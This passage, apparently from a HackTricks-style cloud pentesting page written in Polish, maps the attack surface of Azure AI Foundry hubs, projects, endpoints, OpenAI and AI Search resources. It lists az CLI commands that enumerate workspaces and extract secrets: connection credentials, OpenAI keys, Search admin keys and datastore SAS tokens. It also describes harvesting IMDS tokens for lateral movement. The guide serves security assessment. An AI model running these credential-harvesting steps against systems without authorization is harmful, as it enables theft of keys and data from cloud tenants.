Kompromitacja pojedynczego hub/project może więc oznaczać kontrolę nad downstream managed identities, compute clusters, online endpoints oraz dowolnymi search indexes lub OpenAI deployments referencjonowanymi przez prompt flows.
## Kluczowe komponenty i powierzchnia bezpieczeństwa
- **AI Hub (`Microsoft.MachineLearningServices/hubs`)**: Obiekt najwyższego poziomu definiujący region, managed network, system datastores, domyślny Key Vault, Container Registry, Log Analytics oraz hub-level identities. Skompromitowany hub pozwala atakującemu wstrzyknąć nowe projects, registries lub user-assigned identities.
- **AI Projects (`Microsoft.MachineLearningServices/workspaces`)**: Hostują prompt flows, data assets, environments, component pipelines oraz online/batch endpoints. Projects dziedziczą zasoby hub i mogą je zastąpić własnym storage, kv i MI. Każdy workspace przechowuje sekrety pod `/connections` i `/datastores`.
- **Managed Compute & Endpoints**: Obejmuje managed online endpoints, batch endpoints, serverless endpoints, AKS/ACI deployments oraz on-demand inference servers. Tokeny pobierane z Azure Instance Metadata Service (IMDS) wewnątrz tych runtime'ów zwykle niosą przypisania ról workspace/project MI (często `Contributor` lub `Owner`).
- **AI Registries & Model Catalog**: Umożliwiają dzielenie modeli, environments, components, danych i wyników ewaluacji w regionie. Registries mogą automatycznie synchronizować się z GitHub/Azure DevOps, co oznacza, że PATs mogą być osadzone w definicjach połączeń.
- **Azure OpenAI (`Microsoft.CognitiveServices/accounts` with `kind=OpenAI`)**: Dostarcza modele z rodziny GPT. Dostęp jest kontrolowany przez przypisania ról + admin/query keys. Wiele Foundry prompt flows przechowuje wygenerowane klucze jako sekrety lub zmienne środowiskowe dostępne z compute jobs.
- **Azure AI Search (`Microsoft.Search/searchServices`)**: Vector/index storage zazwyczaj podłączony przez Search admin key przechowywany w połączeniu projektu. Dane indeksu mogą zawierać wrażliwe embeddings, pobrane dokumenty lub surowe korpusy treningowe.
## Architektura istotna dla bezpieczeństwa
### Managed Identities & Role Assignments
- AI hubs/projects mogą włączać **system-assigned** lub **user-assigned** identities. Te tożsamości zwykle posiadają role na storage accounts, key vaults, container registries, Azure OpenAI resources, Azure AI Search services, Event Hubs, Cosmos DB lub custom APIs.
- Online endpoints dziedziczą project MI lub mogą zostać nadpisane dedykowanym user-assigned MI dla danego deploymentu.
- Prompt Flow connections i Automated Agents mogą żądać tokenów przez `DefaultAzureCredential`; przechwycenie metadata endpoint z compute daje tokeny umożliwiające lateral movement.
### Granice sieciowe
- Hubs/projects obsługują **`publicNetworkAccess`**, **private endpoints**, **Managed VNet** i **managedOutbound`** reguły. Nieprawidłowa konfiguracja `allowInternetOutbound` lub otwarte scoring endpoints umożliwiają bezpośrednią eksfiltrację.
- Azure OpenAI oraz AI Search obsługują **firewall rules**, **Private Endpoint Connections (PEC)**, **shared private link resources** oraz `trustedClientCertificates`. Gdy public access jest włączony, te usługi akceptują żądania z dowolnego source IP, który zna klucz.
### Magazyny danych i sekretów
- Domyślne wdrożenia hub/project tworzą **storage account**, **Azure Container Registry**, **Key Vault**, **Application Insights** oraz **Log Analytics** workspace wewnątrz ukrytej managed resource group (wzorzec: `mlw-<workspace>-rg`).
- Workspace **datastores** referencjonują blob/data lake containers i mogą osadzać SAS tokens, service principal secrets lub storage access keys.
- Workspace **connections** (dla Azure OpenAI, AI Search, Cognitive Services, Git, Hugging Face itd.) przechowują poświadczenia w workspace Key Vault i ujawniają je poprzez management plane przy listowaniu connection (wartości są base64-encoded JSON).
- **AI Search admin keys** dają pełny dostęp do odczytu/zapisu do indexes, skillsets, data sources oraz pozwalają na pobieranie dokumentów, które zasilają systemy RAG.
### Monitorowanie i łańcuch dostaw
- AI Foundry wspiera integrację z GitHub/Azure DevOps dla kodu i prompt flow assets. OAuth tokens lub PATs żyją w Key Vault + metadata połączeń.
- Model Catalog może mirrorować Hugging Face artifacts. Jeśli `trust_remote_code=true`, podczas deploymentu może zostać wykonany arbitralny kod Python.
- Data/feature pipelines logują do Application Insights lub Log Analytics, ujawniając connection strings.
## Enumeracja za pomocą `az`
```bash
# Install the Azure ML / AI CLI extension (if missing)
az extension add --name ml
# Enumerate AI Hubs (workspaces with kind=hub) and inspect properties
az ml workspace list --filtered-kinds hub --resource-group <RG> --query "[].{name:name, location:location, rg:resourceGroup}" -o table
az resource show --name <HUB> --resource-group <RG> \
--resource-type Microsoft.MachineLearningServices/workspaces \
--query "{location:location, publicNetworkAccess:properties.publicNetworkAccess, identity:identity, managedResourceGroup:properties.managedResourceGroup}" -o jsonc
# Enumerate AI Projects (kind=project) under a hub or RG
az resource list --resource-type Microsoft.MachineLearningServices/workspaces --query "[].{name:name, rg:resourceGroup, location:location}" -o table
az ml workspace list --filtered-kinds project --resource-group <RG> \
--query "[?contains(properties.hubArmId, '/workspaces/<HUB>')].{name:name, rg:resourceGroup, location:location}"
# Show workspace level settings (managed identity, storage, key vault, container registry)
az ml workspace show --name <WS> --resource-group <RG> \
--query "{managedNetwork:properties.managedNetwork, storageAccount:properties.storageAccount, containerRegistry:properties.containerRegistry, keyVault:properties.keyVault, identity:identity}"
# List workspace connections (OpenAI, AI Search, Git, data sources)
az ml connection list --workspace-name <WS> --resource-group <RG> --populate-secrets -o table
az ml connection show --workspace-name <WS> --resource-group <RG> --name <CONNECTION>
# For REST (returns base64 encoded secrets)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections/<CONN>?api-version=2024-04-01"
# Enumerate datastores and extract credentials/SAS
az ml datastore list --workspace-name <WS> --resource-group <RG>
az ml datastore show --name <DATASTORE> --workspace-name <WS> --resource-group <RG>
# List managed online/batch endpoints and deployments (capture identity per deployment)
az ml online-endpoint list --workspace-name <WS> --resource-group <RG>
az ml online-endpoint show --name <ENDPOINT> --workspace-name <WS> --resource-group <RG>
az ml online-deployment show --name <DEPLOYMENT> --endpoint-name <ENDPOINT> --workspace-name <WS> --resource-group <RG> \
--query "{identity:identity, environment:properties.environmentId, codeConfiguration:properties.codeConfiguration}"
# Discover prompt flows, components, environments, data assets
az ml component list --workspace-name <WS> --resource-group <RG>
az ml data list --workspace-name <WS> --resource-group <RG> --type uri_folder
az ml environment list --workspace-name <WS> --resource-group <RG>
az ml job list --workspace-name <WS> --resource-group <RG> --type pipeline
# List hub/project managed identities and their role assignments
az identity list --resource-group <RG>
az role assignment list --assignee <MI-PRINCIPAL-ID> --all
# Azure OpenAI resources (filter kind==OpenAI)
az resource list --resource-type Microsoft.CognitiveServices/accounts \
--query "[?kind=='OpenAI'].{name:name, rg:resourceGroup, location:location}" -o table
az cognitiveservices account list --resource-group <RG> \
--query "[?kind=='OpenAI'].{name:name, location:location}" -o table
az cognitiveservices account show --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account keys list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account deployment list --name <AOAI-NAME> --resource-group <RG>
az cognitiveservices account network-rule list --name <AOAI-NAME> --resource-group <RG>
# Azure AI Search services
az search service list --resource-group <RG>
az search service show --name <SEARCH-NAME> --resource-group <RG> \
--query "{sku:sku.name, publicNetworkAccess:properties.publicNetworkAccess, privateEndpoints:properties.privateEndpointConnections}"
az search admin-key show --service-name <SEARCH-NAME> --resource-group <RG>
az search query-key list --service-name <SEARCH-NAME> --resource-group <RG>
az search shared-private-link-resource list --service-name <SEARCH-NAME> --resource-group <RG>
# AI Search data-plane (requires admin key in header)
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexes?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/datasources?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
az rest --method GET \
--url "https://<SEARCH-NAME>.search.windows.net/indexers?api-version=2024-07-01" \
--headers "api-key=<ADMIN-KEY>"
# Linkage between workspaces and search / openAI (REST helper)
az rest --method GET \
--url "https://management.azure.com/subscriptions/<SUB>/resourceGroups/<RG>/providers/Microsoft.MachineLearningServices/workspaces/<WS>/connections?api-version=2024-04-01" \
--query "value[?properties.target=='AzureAiSearch' || properties.target=='AzureOpenAI']"
```
## Na co zwracać uwagę podczas oceny
- **Zakres tożsamości**: Projekty często ponownie używają potężnej user-assigned identity przypisanej do wielu usług. Przechwycenie tokenów IMDS z dowolnego managed compute powoduje odziedziczenie tych uprawnień.
- **Connection objects**: Ładunek Base64 zawiera secret oraz metadata (endpoint URL, API version). Wiele zespołów zostawia tutaj OpenAI + Search admin keys zamiast rotować je często.
- **Git & external source connectors**: PATs lub OAuth refresh tokens mogą pozwolić na push access do kodu definiującego pipelines/prompt flows.
- **Datastores & data assets**: Udostępniają SAS tokens ważne przez miesiące; data assets mogą wskazywać na PII klientów, embeddings lub zbiory treningowe.
- **Managed Network overrides**: `allowInternetOutbound=true` lub `publicNetworkAccess=Enabled` sprawia, że eksfiltracja sekretów z jobs/endpoints jest trywialna.
- **Hub-managed resource group**: Zawiera storage account (`<workspace>storage`), container registry, KV i Log Analytics. Dostęp do tej RG często oznacza pełne przejęcie, nawet jeśli portal to ukrywa.
## Referencje
- [Azure AI Foundry architecture](https://learn.microsoft.com/en-us/azure/ai-studio/concepts/ai-resources)
- [Azure Machine Learning CLI v2](https://learn.microsoft.com/en-us/azure/machine-learning/how-to-configure-cli)
- [Azure OpenAI security controls](https://learn.microsoft.com/en-us/azure/ai-services/openai/how-to/network-security)
- [Azure AI Search security](https://learn.microsoft.com/en-us/azure/search/search-security-overview)
{{#include ../../../banners/hacktricks-training.md}}